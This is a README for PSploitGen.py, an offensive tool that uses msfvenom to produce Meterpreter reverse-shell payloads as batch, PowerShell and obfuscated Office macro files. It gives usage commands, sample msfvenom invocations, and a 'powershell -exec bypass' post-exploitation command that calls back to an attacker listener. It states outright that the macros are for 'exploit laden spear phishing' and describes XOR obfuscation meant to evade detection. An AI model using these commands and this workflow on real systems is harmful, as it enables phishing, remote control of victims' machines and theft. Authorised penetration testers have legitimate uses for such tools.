PSploitGen.py
=============

This python script generates metasploit shellcode payloads in Windows
batch file format, powershell script format, and MS-Office visual
basic macro format.  The default metasploit payloads are:

* windows/meterpreter/reverse_tcp
* windows/x64/meterpreter/reverse_tcp

If TCP port 443 is specified, the script will automatically generate
an HTTPS payload also using 'windows/meterpreter/reverse_https'.  The
script will accept multiple TCP ports which are comma delimitered.

## Usage

    $ ./psploitgen.py --lhost 10.10.10.10 --lport 22,23,25,53

The visual basic payload for MS-Office is special in that it will
perform significant obfuscation using an XOR function with highly random
key for all the powershell command syntax, and also using very
highly randomized VBA variable names.  The random strings are generate
every single time a payload is generated.  

The key idea of the MS-Office payloads is to copy and paste into a
document of choice, and use for exploit laden spear phishing.

## Example

    # ./psploitgen.py --lhost 10.10.1.181 --lport 443
    [*]------------------------------------------
    [*] PSploitGen Version [20140918_1129]
    [*] Author: Joff Thyer (c) 2014
    [*]------------------------------------------
    [*] LHOST.....: 10.10.1.181
    [*] LPORT.....: [443]
    [*] PAYLOADS..: 
    [+]    windows/meterpreter/reverse_tcp
    [+]    windows/x64/meterpreter/reverse_tcp
    [+]    windows/meterpreter/reverse_https
    [*]------------------------------------------
    [*] msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.181 LPORT=443 EXITFUNC=thread -f powershell
    [*] Creating [ps-10.10.1.181-x86-meter-rtcp443.bat]
    [*] Creating [ps-10.10.1.181-x86-meter-rtcp443.ps1]
    [*] Creating [ps-10.10.1.181-x86-meter-rtcp443.vbs]
    [*] msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.181 LPORT=443 EXITFUNC=thread -f powershell
    [*] Creating [ps-10.10.1.181-x64-meter-rtcp443.bat]
    [*] Creating [ps-10.10.1.181-x64-meter-rtcp443.ps1]
    [*] msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.1.181 LPORT=443 EXITFUNC=thread -f powershell
    [*] Creating [ps-10.10.1.181-x86-meter-rhttps443.bat]
    [*] Creating [ps-10.10.1.181-x86-meter-rhttps443.ps1]
    [*] Creating [ps-10.10.1.181-x86-meter-rhttps443.vbs]

## Post exploitation usage

The idea of both the powershell script and the batch script is that
in a post exploitation context, you would upload the script to the
remote host, and use it to establish a command and control channel
back to your metasploit listener.

For example:

    C:\> powershell -exec bypass -file ps-10.10.10.10-x86-meter-rtcp443.ps1

## output filename convention

The output script files are generated with a convention that looks
as follows:

    ps-<ipaddr>-<arch>-<payload>-<proto><port>.(bat|vbs|ps1)

## powershell payload

Each one of the different payload formats stem from a common
use of the PowerSploit project, specifically the "Invoke-Shellcode"
cmdlet within that project.  During code generation, the invoke
shellcode cmdlet will be downloaded from the PowerSploit github
site.  If unavailable, a local copy will be used.

Whether powershell is executed from
command line, batch file, or from an MS-Office document, the payload
will be passed as a string of bytes.  The powershell function will
dynamically allocate an executable memory segment and create the
thread with an assembly stub in RAM.

## System Architecture

Powershell running natively under 64-bit systems will not execute
a 32-bit shellcode payload, and neither will powershell running
under 32-bit execute a 64-bit payload.  The default path statements
will execute the O/S native version of powershell.   The generated
batch files will perform an architecture check for you.

## Sponsors

[![Black Hills Information Security](http://www.blackhillsinfosec.com/_images/BHIS-Logo.png)](http://www.blackhillsinfosec.com)

